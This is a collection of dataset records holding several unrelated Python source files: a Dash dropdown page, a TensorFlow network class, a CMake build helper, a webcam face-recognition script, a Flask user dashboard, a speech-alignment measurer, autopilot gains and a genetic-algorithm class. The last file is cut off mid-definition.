short_name='Buttons')\n\n# See assets.css for icon and text styling\n\n@dataclass\nclass MyAppState(ContextState):\n page_size: int = 10\n\nMyAppContext: MyAppState = createContext(MyAppState)\n\nclass PageSizeSelect(ButtonContainerAIO):\n\n className ='dropdown-menu dropdown-menu-xs dropdown-menu-end pb-0'\n\n def __init__(self, page_sizes: List, current:int, id):\n super().__init__(page_sizes, current, id=id, className=PageSizeSelect.className)\n\n state = MyAppContext.getState()\n\n @MyAppContext.On(self.button_match.input.n_clicks)\n def page_select(clicks):\n index = trigger_index()\n if index is not None and clicks[index]:\n state.page_size = int(page_sizes[index])\n\n\n def render_buttons(self, elements):\n state = MyAppContext.getState()\n\n def render_button(text):\n if int(text) == state.page_size:\n element = html.Div([text, ICON.TICK], className='dropdown-item d-flex align-items-center fw-bold')\n else:\n element = html.Div(text, className='dropdown-item fw-bold')\n\n if text == elements[-1]:\n element.className += ' rounded-bottom'\n return element\n\n return [render_button(text) for text in elements]\n\ndef page_size_dropdown(id) -> html.Div:\n pid = prefix(id)\n\n button = DropdownAIO.Button([\n ICON.GEAR,html.Span(\"Toggle Dropdown\", className='visually-hidden')\n ], className='btn btn-link text-dark dropdown-toggle dropdown-toggle-split m-0 p-1')\n\n container = PageSizeSelect([\"10\", \"20\", \"30\"], 0, id=pid('settings_container'))\n dropdown = DropdownAIO(button, container, id=pid('settings_dropdown'))\n\n return html.Div(dropdown)\n\n@MyAppContext.Provider()\ndef layout():\n state = MyAppContext.getState()\n size_dropdown = page_size_dropdown('test')\n h4 = html.H4(f\"Page size is {state.page_size}\", id=\"test_h4\")\n return html.Div([h4, 
size_dropdown])\n","repo_name":"stevej2608/dash-spa","sub_path":"examples/button_dropdown/pages/button_page.py","file_name":"button_page.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"60"} +{"seq_id":"30161349405","text":"\"\"\"\nbp神经网络\n\nauthor:Cuson\n2019/12/16\n\"\"\"\nimport tensorflow as tf\nfrom tensorflow.contrib import layers\nimport numpy as np\nimport random\n\n# 定义tanh函数\n# def tanh(x):\n# return np.tanh(x)\n# # tanh函数的导数\n# def tan_deriv(x):\n# return 1.0 - np.tanh(x) * np.tan(x)\n#\n# # sigmoid函数\n# def logistic(x):\n# return 1 / (1 + np.exp(-x))\n# # sigmoid函数的导数\n# def logistic_derivative(x):\n# return logistic(x) * (1 - logistic(x))\n\nclass BPNeuralNetwork:\n def __init__(self, inpt, n_in, n_out, activation='tanh'):\n \"\"\"\n 神经网络算法构造函数\n :param layers: 神经元层数\n :param activation: 使用的函数(默认tanh函数)\n :return:none\n \"\"\"\n # if activation == 'logistic':\n # self.activation = logistic\n # self.activation_deriv = logistic_derivative\n # elif activation == 'tanh':\n # self.activation = tanh\n # self.activation_deriv = tan_deriv\n\n with tf.name_scope('params'):\n with tf.name_scope('weights'):\n self.W = tf.Variable(tf.random_normal([n_in, n_out], mean= 0.0, stddev= 1.0, dtype=tf.float32, seed = None,name= None))\n # tf.summary.histogram('weights', self.W)\n # bias\n with tf.name_scope('bias'):\n self.b = tf.Variable(tf.ones([n_out, ]), dtype=tf.float32)\n\n self.output = tf.matmul(inpt, self.W) + self.b\n tf.add_to_collection('predict',self.output)\n self.params = [self.W, self.b]\n\n def cost(self, y):\n \"\"\"\n y: tf.Tensor, the target of the input\n \"\"\"\n # cross_entropy交叉熵\n with tf.name_scope('loss'):\n # clip_by_value(v,min,max) 截取v,max表示为max\n # opt = tf.clip_by_value(self.output, clip_value_min=1e-10, clip_value_max=1.0)\n # softmax_cross_entropy_with_logits(logits,labels,name=None) 相似性概率\n # cost_ = tf.reduce_mean(tf.square(tf.subtract(y ,self.output)))+layers.l2_regularizer(0.01)(self.W)\n cost_=tf.sqrt(tf.losses.mean_squared_error(y,self.output)+layers.l2_regularizer(0.01)(self.W))\n # summary.scalar对标量数据汇总\n tf.summary.scalar('loss', -cost_)\n return cost_\n\n def accuarcy(self, y):\n\n return tf.sqrt(tf.losses.mean_squared_error(y,self.output))","repo_name":"gaoruohan/DBN_predict_performance","sub_path":"BP.py","file_name":"BP.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"60"} +{"seq_id":"73268629632","text":"import sys\nimport os\nimport subprocess\nimport shutil\n\nclass Path:\n\n def __init__(self, directory=None):\n if (directory != None):\n self.path = directory\n self.normalize()\n else:\n self.path = os.getcwd()\n self.normalize()\n\n if (not self.check()):\n msg = \"The supplied path %s is invalid\" % self.path\n raise Exception(msg)\n\n def normalize(self):\n if (sys.platform == \"win32\"):\n self.path = self.path.replace('/', '\\\\')\n else:\n self.path = self.path.replace('\\\\', '/')\n self.path = os.path.abspath(self.path)\n\n def check(self):\n return os.path.exists(self.path)\n\n def __repr__(self) -> str:\n return self.path\n\n def back(self, n=1):\n\n back = self.path\n for i in range(n):\n back = os.path.join(back, \"../\")\n\n return Path(back)\n\n def join(self, directory):\n result = self.path\n return Path(os.path.join(result, directory))\n\n def file(self, path):\n result = self.path\n return os.path.join(result, path)\n\n def create(self, relative):\n 
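# Join 'relative' onto this path, normalizing separators for the host OS, and create the directory (with parents) if missing\n        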
result = self.path\n if (sys.platform == \"win32\"):\n relative = relative.replace('/', '\\\\')\n else:\n relative = relative.replace('\\\\', '/')\n\n joinResult = os.path.join(result, relative)\n if (not os.path.isdir(joinResult)):\n os.makedirs(joinResult)\n return Path(joinResult)\n\n def subdir(self, relative):\n result = self.path\n if (sys.platform == \"win32\"):\n relative = relative.replace('/', '\\\\')\n else:\n relative = relative.replace('\\\\', '/')\n\n joinResult = os.path.join(result, relative)\n if (not os.path.isdir(joinResult)):\n msg = \"The path '%s' does not exist \" % joinResult\n raise Exception(msg)\n\n return Path(joinResult)\n\n def recreate(self):\n result = self.path\n\n os.makedirs(result)\n return Path(result)\n\n def remove(self):\n if (os.path.isdir(self.path)):\n print(\"Removing\".ljust(20), \"=> \", self.path)\n shutil.rmtree(self.path, ignore_errors=True)\n\n def copyTo(self, file, toPath):\n print(\"Copy\", self.file(file), \"=> \", toPath.file(file))\n\n shutil.copyfile(self.file(file), toPath.file(file))\n shutil.copymode(self.file(file), toPath.file(file))\n\n def copyTree(self, toPath):\n print(\"Copy\".ljust(20), \"=> \", toPath.path)\n shutil.copytree(self.path, toPath.path, dirs_exist_ok=True)\n\n def removeFile(self, file):\n localFile = os.path.join(self.path, file)\n\n if (os.path.isfile(localFile)):\n print(\"Removing\", localFile)\n os.remove(localFile)\n\n\nclass Builder:\n\n def __init__(self, argc, argv):\n\n self.argc = argc\n self.argv = argv\n self.release = self.findOpt(\"--release\")\n self.opts = {}\n\n sourceDir = Path()\n self.opts['source'] = sourceDir\n self.opts['build'] = sourceDir.create(\"Build\")\n self.opts['deploy'] = sourceDir.create(\"Bin\")\n self.opts['test'] = sourceDir.join(\"Testing\")\n\n if (sys.platform == \"win32\"):\n platName = \"windows\"\n else:\n platName = 'linux'\n\n self.opts['platform'] = platName\n\n def home(self): return self.opts['source']\n def sourceDir(self): return self.opts['source']\n def buildDir(self): return self.opts['build']\n def deployDir(self): return self.opts['deploy']\n\n def dumpOpts(self):\n print(\"\")\n print(\"Build Paths\")\n for k in self.opts.keys():\n print(k.ljust(20), \"=>\", self.opts[k])\n print(\"\")\n\n def goto(self, path):\n try:\n os.chdir(path.path)\n except:\n msg = \"Failed to change working directory to %s\" % path.path\n raise Exception(msg)\n\n def configString(self):\n config = \"Debug\"\n if (self.release):\n config = \"Release\"\n return config\n\n def run(self, cmd):\n print(\"Calling =>\", cmd)\n subprocess.run(cmd, shell=True, env=os.environ)\n\n def findOpt(self, opt):\n for i in range(self.argc):\n if (opt == self.argv[i]):\n return True\n return False\n\n def clean(self, reCreate=False):\n print(\"Cleaning...\".ljust(20), self.argv)\n self.buildDir().remove()\n self.goto(self.home())\n\n def configure(self, reCreate=False):\n print(\"Configure...\".ljust(20), self.argv)\n\n self.goto(self.buildDir())\n self.run(\"cmake ..\")\n self.goto(self.home())\n\n def build(self):\n print(\"Building...\".ljust(20), self.argv)\n self.goto(self.buildDir())\n\n self.run(\"cmake .. 
-DJam_BUILD_TEST=ON -DJam_AUTO_RUN_TEST=ON \")\n self.run(\"cmake --build %s --config=%s \"%(self.buildDir(), self.configString()))\n self.goto(self.home())\n\n def deploy(self ):\n self.release = True\n self.build()\n\n\n print(\"Deploy...\".ljust(20), self.argv)\n self.goto(self.deployDir())\n self.run(\"windeployqt .\")\n self.goto(self.home())\n \n def edit(self ):\n print(\"Testing...\".ljust(20), self.argv)\n self.goto(self.home())\n\n def logUsage(self):\n print(\"build \")\n print(\"\")\n print(\" Where is one of the following\")\n print(\"\")\n print(\" clean - Removes the build directories\")\n print(\" config - Configure with CMake\")\n print(\" help - Displays this message\")\n print(\" deploy - Build the windows deployment\")\n print(\"\")\n print(\"\")\n\n\ndef main(argc, argv):\n build = Builder(argc, argv)\n build.dumpOpts()\n build.logUsage()\n\n if (build.findOpt(\"clean\")):\n build.clean();\n elif (build.findOpt(\"config\")):\n build.configure();\n elif (build.findOpt(\"deploy\")):\n build.deploy();\n else:\n build.build();\n\n\n build.goto(build.home())\n\nif __name__ == '__main__':\n main(len(sys.argv), sys.argv)\n","repo_name":"csparks78/Jam","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"40445327080","text":"import sys\nimport Update\nfrom ReverseSearch import UploadImage, SearchImage \nimport numpy as np\nimport cv2\nimport face_recognition\nimport json\n\n\nui = UploadImage()\nsi = SearchImage()\n# link = ui.upload(\"rekha.jpeg\")\n# link\n\nknown_face_names, known_face_encodings = Update.update()\n\nfaceCascade = cv2.CascadeClassifier('Models/haarcascade_frontalface_default.xml')\ncap = cv2.VideoCapture(0)\ncap.set(3,1000) # set Width\ncap.set(4,720) # set Height\nwhile True:\n ret, img = cap.read()\n # img = cv2.flip(img)\n img = np.array(img)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n faces = faceCascade.detectMultiScale(\n gray, \n scaleFactor = 1.2,\n minNeighbors = 8,\n minSize = (10, 10)\n # maxSize = (480,480)\n )\n \n for (x,y,w,h) in faces:\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),3)\n roi_gray = gray[y:y+h+1, x:x+w+1]\n roi_color = img[y:y+h+1, x:x+w+1]\n \n cv2.imwrite(\"catch.jpg\", roi_color)\n\n # Load an image with an unknown face\n # unknown_image = face_recognition.load_image_file(\"catch.jpg\")\n\n # Find all the faces and face encodings in the unknown image\n unknown_image = roi_color\n # unknown_image = roi_gray\n # print(type(face_image))\n # face_locations = face_recognition.face_locations(unknown_image)\n\n face_encodings = face_recognition.face_encodings(unknown_image)\n if(len(face_encodings) >= 1):\n face_encodings = face_encodings[0]\n\n # print(face_encodings)\n # print(known_face_encodings)\n matches = face_recognition.compare_faces(known_face_encodings, face_encodings, tolerance=0.62)\n\n name = \"Unknown\"\n\n face_distances = face_recognition.face_distance(known_face_encodings, face_encodings)\n best_match_index = np.argmin(face_distances)\n if matches[best_match_index]:\n name = known_face_names[best_match_index]\n\n # font\n font = cv2.FONT_HERSHEY_SIMPLEX\n \n # org\n org = (x , y + h + 40)\n \n # fontScale\n fontScale = 1.2\n \n # Blue color in BGR\n color = (255, 255, 150)\n \n # Line thickness of 2 px\n thickness = 2\n \n # Using cv2.putText() method\n image = cv2.putText(img, name, org, font, \n fontScale, color, thickness, cv2.LINE_AA)\n\n\n\n 
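# Show the annotated frame: ESC (27) exits the loop; 'f' uploads the cropped face and writes the reverse-search result to temp.json\n    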
cv2.imshow('video',img)\n k = cv2.waitKey(30) & 0xff\n if k == 27: # press 'ESC' to quit\n break\n elif k == ord('f'):\n link = ui.upload(\"catch.jpg\")\n data = si.search(link)\n with open(\"temp.json\", 'w') as f:\n f.write(json.dumps(data, indent = 4))\ncap.release()\ncv2.destroyAllWindows()","repo_name":"srajan-kiyotaka/CoconifiAi-Face-Recognation-Cum-Reverse-Search","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"42317246897","text":"import datetime\nfrom flask import Blueprint, Response, session, request, flash, redirect\n\nfrom task_tracker.forms.task_forms import RegistrationForm, ConfirmUserForm\nfrom task_tracker.mongo.collections import users\nfrom task_tracker.utils.login_helpers.decorators import login_required, not_logged_in\nfrom task_tracker.utils.login_helpers.login_utils import set_redis_session, generate_hash, login_user\nfrom task_tracker.utils.response_utils import render_template\nfrom task_tracker.utils.utils import is_user_exists, add_new_user, confirm_token\nfrom task_tracker import login_manager\n\ndashboard_app = Blueprint(__name__, __name__)\n\n@dashboard_app.route(\"/user/dashboard\")\n@login_required\ndef user_dashboard():\n \"\"\"\n Display Dahsboard of the user\n :return:\n \"\"\"\n return Response('
User area {0}
'.format(session.get(\"email\")))\n\n\n@dashboard_app.route(\"/admin/dashboard\")\n@login_required\ndef admin_dashboard():\n \"\"\"\n Display dashboard of the admin\n :return:\n \"\"\"\n return render_template(\"sadashboard.html\")\n\n\n@dashboard_app.route(\"/admin/add/user\", methods=[\"GET\", \"POST\"])\n@login_required\ndef add_user():\n \"\"\"\n Display dashboard of the admin\n :return:\n \"\"\"\n form = RegistrationForm()\n if request.method == \"POST\":\n if form.validate_on_submit():\n form_data = request.form.to_dict()\n if not is_user_exists(form_data):\n add_new_user(form_data)\n return render_template(\"confirmation.html\", form=form)\n return render_template(\"add_user.html\", errors=\"User Exists\", form=form)\n return render_template(\"add_user.html\", form=form)\n return render_template(\"add_user.html\", form=form)\n\n\n@dashboard_app.route(\"/admin/delete/user\", methods=[\"GET\", \"POST\"])\n@login_required\ndef delete_user():\n \"\"\"\n Display dashboard of the admin\n :return:\n \"\"\"\n return render_template(\"sadashboard.html\")\n\n\n@dashboard_app.route('/confirm_email/', methods=['GET', 'POST'])\n@not_logged_in\ndef confirm_email(token):\n form = ConfirmUserForm()\n email = ''\n\n try:\n email = confirm_token(token)\n except:\n flash('The confirmation link is invalid or has expired.', 'danger')\n return redirect('/')\n\n if not email:\n flash('The confirmation link is invalid or has expired.', 'danger')\n return redirect('/')\n\n user = users.find_one({'email': email})\n if user['is_active']:\n flash('Account already confirmed. Please login.', 'success')\n return redirect('/login')\n\n if request.method == \"POST\":\n if form.validate_on_submit():\n users.update({'email': email}, {'$set': {\n 'is_active': True,\n 'confirmed_on': datetime.datetime.utcnow(),\n 'password': generate_hash(request.values.get('password'))\n }})\n\n flash('You account has been successfully created. 
Thanks!', 'success')\n login_user(user, admin=False)\n set_redis_session(user[\"role\"], force=True)\n login_manager.error = False\n return redirect('/user/dashboard')\n # login_user(User(email, user['first_name'] + ' ' + user['last_name']), admin=False)\n else:\n flash('Please fix the errors and proceed.', 'danger')\n\n return render_template('create_password.html', form=form)","repo_name":"VelVenkateshDCKAP/Git-Training","sub_path":"python /task_tracker/controllers/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71062755391","text":"import sys\nimport glob\nimport codecs\nimport re\n\ntens_path = \"/Volumes/tensusers/timzee/cgn/\" if sys.platform == \"darwin\" else \"/vol/tensusers/timzee/cgn/\"\n\nindex_dict = {}\n\n\ndef measureS(ali_l, s_word_i):\n word_dict = {}\n ali_i = {}\n for ali_num, line in enumerate(ali_l, 1):\n line_list = line[:-1].split(\"\\t\")\n if ali_num == 1:\n for n_num, n in enumerate(line_list, 0):\n ali_i[n] = n_num\n else:\n start_t = float(line_list[ali_i[\"start\"]])\n end_t = start_t + float(line_list[ali_i[\"dur\"]])\n kal_lab = line_list[ali_i[\"phone\"]]\n if kal_lab in [\"SIL\"]:\n continue\n phon, posi = kal_lab.split(\"_\")\n if posi in [\"B\", \"S\"]:\n word_num = len(word_dict) + 1\n word_dict[word_num] = [(phon, start_t, end_t)]\n else:\n word_num = len(word_dict)\n word_dict[word_num].append((phon, start_t, end_t))\n s_label = word_dict[int(s_word_i)][-1][0]\n if s_label != \"s\":\n s_dur = \"NA\"\n else:\n s_dur = word_dict[int(s_word_i)][-1][2] - word_dict[int(s_word_i)][-1][1]\n return s_dur\n\n\ndef readWrite():\n with codecs.open(tens_path + \"all_s_combined_dur.csv\", \"w\", encoding=\"utf-8\") as h:\n with codecs.open(tens_path + \"all_s_combined.csv\", encoding=\"utf-8\") as f:\n for num, line in enumerate(f, 1):\n if num % 100 == 0:\n print((num / 575823) * 100)\n line_list = line[:-1].split(\",\")\n if num == 1:\n for col_num, name in enumerate(line_list, 0):\n index_dict[name] = col_num\n h.write(line[:-1] + \",s_dur\\n\")\n else:\n f_path = line_list[index_dict[\"wav\"]]\n chunk_start = line_list[index_dict[\"chunk_start\"]]\n chunk_end = line_list[index_dict[\"chunk_end\"]]\n word_chunk_i = line_list[index_dict[\"word_chunk_i\"]]\n glob_list = glob.glob(tens_path + \"KALDI_output/CGN_beam_5_100_v3/{0}_*_{1}_{2}.ali\".format(re.sub(r\"/\", \"_\", f_path), chunk_start, chunk_end))\n# print(f_path)\n if len(glob_list) > 0:\n print(glob_list[0])\n with open(glob_list[0], \"r\") as g:\n ali_lines = g.readlines()\n if len(ali_lines) > 1:\n s_length = measureS(ali_lines, word_chunk_i)\n print(s_length)\n h.write(line[:-1] + \",\" + str(s_length) + \"\\n\")\n\n\nif __name__ == '__main__':\n readWrite()\n","repo_name":"timjzee/dmc-scripts","sub_path":"measureS.py","file_name":"measureS.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25032573960","text":"import sys\nsys.path.append('..')\nimport numpy as np\nimport chap5.transfer_function_coef as TF\nimport parameters.aerosonde_parameters as MAV\n# # import chap4.mav_dynamics as mav\n# from chap4.mav_dynamics import mav_dynamics\n# import parameters.simulation_parameters as SIM\n# # mav = mav_dynamics(SIM.ts_simulation)\ng = MAV.gravity\n# sigma =\nVa0 = MAV.Va0\nVa = Va0\nVg = Va\ndelta_a_max = .5\ndelta_e_max = .7\ndelta_r_max = .5\ne_phi_max = 
np.radians(45)\ne_theta_max = np.radians(35)\ne_beta_max = np.radians(45)\n\n# Longitudinal\nwn_theta = np.sqrt(TF.a_theta2 + delta_e_max/e_theta_max*np.abs(TF.a_theta3))\nzeta_theta = 0.4\nW_h = 26#22 #18 before EKF\nwn_h = 1/W_h*wn_theta\nzeta_h = 0.85#0.707\n\n# Lateral\nwn_phi = np.sqrt(np.abs(TF.a_phi2)*delta_a_max/e_phi_max)\nzeta_phi = 0.3\nW_chi = 15#12 #8 before EKF\nwn_chi = 1/W_chi*wn_phi\nzeta_chi = 0.5\nzeta_beta = 0.707\n\n# Airspeed\nwn_V = wn_h # FIX\nzeta_V = 0.707\n\n#----------roll loop-------------\nroll_kp = delta_a_max/e_phi_max*np.sign(TF.a_phi2)\nroll_kd = (2*zeta_phi*wn_phi - TF.a_phi1)/TF.a_phi2\n\n#----------course loop-------------\ncourse_kp = 2*zeta_chi*wn_chi*Vg/g\ncourse_ki = wn_chi**2*Vg/g\n\n#----------sideslip loop-------------\nsideslip_kp = delta_r_max/e_beta_max*np.sign(TF.a_beta2)\nsideslip_ki = 1/TF.a_beta2*((TF.a_beta1 + TF.a_beta2*sideslip_kp)/(2*zeta_beta))\n\n# #----------yaw damper-------------\n# yaw_damper_tau_r =\n# yaw_damper_kp = 0.5\n\n#----------pitch loop-------------\npitch_kp = delta_e_max/e_theta_max*np.sign(TF.a_theta3)\npitch_kd = (2*zeta_theta*wn_theta - TF.a_theta1)/TF.a_theta3\nK_theta_DC = (pitch_kp*TF.a_theta3)/(TF.a_theta2 + pitch_kp*TF.a_theta3)\n\n#----------altitude loop-------------\naltitude_kp = (2*zeta_h*wn_h)/(K_theta_DC*Va)\naltitude_ki = wn_h**2/(K_theta_DC*Va)\n# altitude_zone = # FIX\n\n#---------airspeed hold using throttle---------------\nairspeed_throttle_kp = (2*zeta_V*wn_V - TF.a_V1)/TF.a_V2\nairspeed_throttle_ki = wn_V**2/TF.a_V2\n","repo_name":"natetoombs/FlightDynamicsPy","sub_path":"parameters/control_parameters.py","file_name":"control_parameters.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6080660464","text":"from Simulator import *\nimport pickle\n\n\"\"\"\n__author__ = Simon Hofmann\"\n__credits__ = [\"Simon Hofmann\", \"Katja Abramova\", \"Willem Zuidema\"]\n__version__ = \"1.0.1\"\n__date__ \"2016\"\n__maintainer__ = \"Simon Hofmann\"\n__email__ = \"simon.hofmann@protonmail.com\"\n__status__ = \"Development\"\n\"\"\"\n\n# Agmon & Beer (2013): \"real-valued GA\":\n'''\n\"Each genetic string is a search vector of real numbers in the range 61,\nand is scaled by each parameter’s defined range\n(...)\nThe top-performing individual is copied twice into the next generation’s\npopulation, and the rest of the population is repopulated through\nfitness-proportionate selection and mutation, with a\nmutation variance of 0.25.\" - Agmon,Beer (2013)\n\nparameters to evolve:\n- time constant: τ (tau)\n- weights: w (weights of interneurons, sensory and motor neurons)\n- bias: θ (theta)\n'''\n\n\nclass Evolution(Simulate):\n\n def __init__(self, pop_size=10, simlength=1000):\n \"\"\"\n :param pop_size:\n \"\"\"\n super(self.__class__, self).__init__(simlength) # self.agent, self.simlength\n\n self.genome = self.create_genome() # vector of parameters\n\n self.pop_list = self.__create_pop_list(pop_size)\n\n self.generation = 0\n\n self.filename = \"\" # starts with \"sim....\"\n\n def create_genome(self):\n \"\"\"\n Reshape parameter matrices into 1-D vectors and concatenate them\n :rtype: vector\n :return: vector of all parameters\n \"\"\"\n a = np.reshape(self.agent.W, (self.agent.W.size, 1))\n g = np.reshape(self.agent.WM, (self.agent.WM.size, 1))\n t = np.reshape(self.agent.WV, (self.agent.WV.size, 1))\n c = np.reshape(self.agent.Theta, (self.agent.Theta.size, 1))\n u = np.reshape(self.agent.Tau, 
(self.agent.Tau.size, 1))\n\n return np.concatenate((a, g, t, c, u))\n\n def implement_genome(self, genome_string):\n\n assert genome_string.size == self.genome.size, \"Genome has not the right size\"\n\n a = self.agent.W.size\n g = self.agent.WM.size\n t = self.agent.WV.size\n c = self.agent.Theta.size\n u = self.agent.Tau.size\n\n w = genome_string[:a]\n wm = genome_string[a:a+g]\n wv = genome_string[a+g:a+g+t]\n theta = genome_string[a+g+t:a+g+t+c]\n tau = genome_string[a+g+t+c:a+g+t+c+u]\n\n self.agent.W = np.matrix(np.reshape(w, (self.agent.N, self.agent.N)))\n self.agent.WM = np.matrix(np.reshape(wm, (g, 1))) # for poplists before 1.June take the reshape out (see github, also CTRNN.py)\n self.agent.WV = np.matrix(np.reshape(wv, (t, 1)))\n self.agent.Theta = np.matrix(np.reshape(theta, (c, 1)))\n self.agent.Tau = np.matrix(np.reshape(tau, (u, 1)))\n\n # Update the self.genome:\n if not isinstance(genome_string, np.matrix):\n genome_string = np.matrix(genome_string).transpose()\n\n self.genome = genome_string\n\n def fitness(self):\n \"\"\"\n Fitness is the distance to target after the simulation run.\n :rtype: distance to Target (int)\n \"\"\"\n return np.linalg.norm(self.agent.position_target - self.agent.position)\n\n def __create_pop_list(self, pop_size):\n \"\"\"\n :param pop_size: Amount of individuals per Population\n :return: ordered list (via fitness) of all agents\n \"\"\"\n\n poplist = np.zeros((pop_size, np.size(self.genome)+2))\n\n for i in range(pop_size):\n poplist[i, 0] = i+1 # enumerate the list\n poplist[i, 2:] = self.genome.transpose() # the corresponding genome will be stored\n self.agent = CatchBot() # Create new agent\n self.genome = self.create_genome() # ... and its genome\n\n return poplist\n\n def pick_best(self):\n return self.pop_list[(0, 1), :]\n\n def gen_code(self):\n gens = OrderedDict([(\"A\", self.agent.W.size),\n (\"G\", self.agent.WM.size),\n (\"T\", self.agent.WV.size),\n (\"C\", self.agent.Theta.size),\n (\"U\", self.agent.Tau.size)])\n return gens\n\n def _reproduction(self, mutation_var, fps=False):\n \"\"\"\n If fitness proportionate selection (fps) = False:\n +: sexual reproduction, saves best, adds new random bots\n -: Computationally expensive.\n\n 1) Takes the best agent and copy it twice in new population.\n 2) Takes the second best agent and copy it once in new population.\n 3) Creates two children of two parents. Since step 1) & 2) we have a chance of genetic crossover of 100%.\n Furthermore, we use whole sections of the genome for the crossover (e.g. 
all W, or all Thetas)\n        4) Fitness-proportionate selection of 2 further agents\n        5) Fill the rest with randomly created agents\n\n        6) All but the first best agent will fall under a mutation with a variance of .25 (default)\n            - time constant: τ (tau) in range [1, 10]\n            - weights: w (weights of interneurons, sensory and motor neurons) in range [-13, 13]\n            - bias: θ (theta) in range [-13, 13]\n\n        > > > > > < < < < < > > > > > < < < < < > > > > > < < < < < > > > > > < < < < < > > > > > < < < < <\n\n        If fps = True:\n        Simpler, asexual, fitness-proportionate selection.\n\n        + : Computationally more efficient.\n        - : Might need more Generations to converge\n\n        All new agents will fall under a mutation with a variance of .25 (default):\n            - time constant: τ (tau) in range [1, 10]\n            - weights: w (weights of interneurons, sensory and motor neurons) in range [-13, 13]\n            - bias: θ (theta) in range [-13, 13]\n\n        :param mutation_var: given by run_evolution() (0.25 by default, according to Agmon & Beer (2013))\n        :return: self.pop_list = repopulated list (new_population)\n        \"\"\"\n\n        gens = self.gen_code()\n\n        if fps:\n\n            new_population = np.zeros(self.pop_list.shape) # This will be turned in the end...\n\n            # Algorithm for fitness proportionate selection:\n            # Source: http://stackoverflow.com/questions/298301/roulette-wheel-selection-algorithm/320788#320788\n            # >>\n\n            fitness = copy.copy(self.pop_list[:, 1])\n            fitness = 1-normalize(fitness) # sign is correct, apparently\n\n            total_fitness = sum(fitness)\n            relative_fitness = [f/total_fitness for f in fitness]\n\n            probs = [sum(relative_fitness[:i+1]) for i in range(len(relative_fitness))]\n\n            for num in range(new_population.shape[0]):\n                r = np.random.random() # random sample of continuous uniform distribution [0,1)\n                for (i, individual) in enumerate(self.pop_list):\n                    if r <= probs[i]:\n                        new_population[num, :] = individual\n                        break\n\n            # <<\n\n        else: # if fps is false: Complex Evolution\n\n            new_population = copy.copy(self.pop_list) # This will be turned in the end...\n\n            new_population[0, 0] = 1 # reset enumeration for first agent\n\n            # 1)\n            # is already on first place, here we set it again on the second place\n            new_population[1, :] = copy.copy(self.pop_list[0, :])\n            # 2)\n            new_population[2, :] = copy.copy(self.pop_list[1, :])\n            # 3)\n            new_population[3, :] = copy.copy(self.pop_list[0, :])\n            new_population[4, :] = copy.copy(self.pop_list[0, :])\n\n            for i in [3, 4]: # => new_population[(3,4),:]\n\n                # Alternatively, here we pick randomly 2 single genomic loci:\n                # index = np.argmax(np.random.sample(self.genome.size)) + 2 -1\n                # index2 = np.argmax(np.random.sample(self.genome.size)) +2 -1\n                # new_population[i, index] = copy.copy(self.pop_list[1, index]) # crossover from second parent\n                # new_population[i, index2] = copy.copy(self.pop_list[1, index2])\n\n                # Crossover of a whole genome section of the second parent:\n\n                choice = np.random.choice([gen for gen in gens]) # Random choice of a section in genome\n\n                index = 0 # indexing the section in whole genome string\n                for gen in gens:\n                    index += gens[gen]\n                    if gen == choice:\n                        break\n                index += 2 # leaves the number and fitness of agent out (new_population[:,(0,1)])\n\n                # crossover from second parent\n                new_population[i, (index-gens[choice]):index] = copy.copy(self.pop_list[1, (index-gens[choice]):index])\n\n                # Test: self.agent.PARAMETER (depending on choice)\n\n            # 4)\n            norm_pop = normalize(np.power(self.pop_list[2:, 1], -1)) if \\\n                np.any(self.pop_list[2:, 1] != 0) else self.pop_list[2:, 1]\n            rand_pop = 
np.random.sample(np.size(self.pop_list[2:, 1]))\n            norm_rand = norm_pop * rand_pop\n            ordered = copy.copy(self.pop_list[np.argsort(-norm_rand)+2, :])\n            new_population[5, :] = ordered[0, :]\n            new_population[6, :] = ordered[1, :]\n\n            # 5)\n            for i in range(new_population[7:, :].shape[0]):\n                self.agent = CatchBot() # Create new agent\n                self.genome = self.create_genome() # ... and its genome\n                new_population[7+i, 2:] = self.genome.transpose()\n\n        # 6) Mutation (for fps=True & False):\n\n        agtc = sum(gens.values()) - gens[\"U\"] # sum of all gen-sizes, except Tau\n        u = gens[\"U\"] # == self.agent.Tau.size\n\n        mu, sigma = 0, np.sqrt(mutation_var) # mean and standard deviation\n\n        for i in range(1-fps, new_population.shape[0]): # if fps = False => range(1,size), else => range(0,size)\n\n            mutation_agtc = np.random.normal(mu, sigma, agtc)\n            mutation_u = np.random.normal(mu, sigma, u)\n\n            agtc_mutated = new_population[i, 2:agtc+2] + mutation_agtc\n\n            # Replace values beyond the range with max.range\n            agtc_mutated[agtc_mutated > self.agent.W_RANGE[1]] = self.agent.W_RANGE[1]\n            # ... or min.range (T_RANGE = W.RANGE =[-13, 13])\n            agtc_mutated[agtc_mutated < self.agent.W_RANGE[0]] = self.agent.W_RANGE[0]\n\n            new_population[i, 2:agtc+2] = agtc_mutated\n\n            u_mutated = new_population[i, (agtc+2):] + mutation_u\n\n            # Replace values beyond the range with max.range\n            u_mutated[u_mutated > self.agent.TAU_RANGE[1]] = self.agent.TAU_RANGE[1]\n            # ... or min.range (TAU_RANGE = [1, 10])\n            u_mutated[u_mutated < self.agent.TAU_RANGE[0]] = self.agent.TAU_RANGE[0]\n\n            new_population[i, (agtc+2):] = u_mutated\n\n            new_population[i, 0] = i+1 # reset enumeration\n            new_population[i, 1] = 0 # reset fitness\n\n        self.pop_list = copy.copy(new_population)\n\n    @staticmethod\n    def _set_target(position_agent=[50, 50], 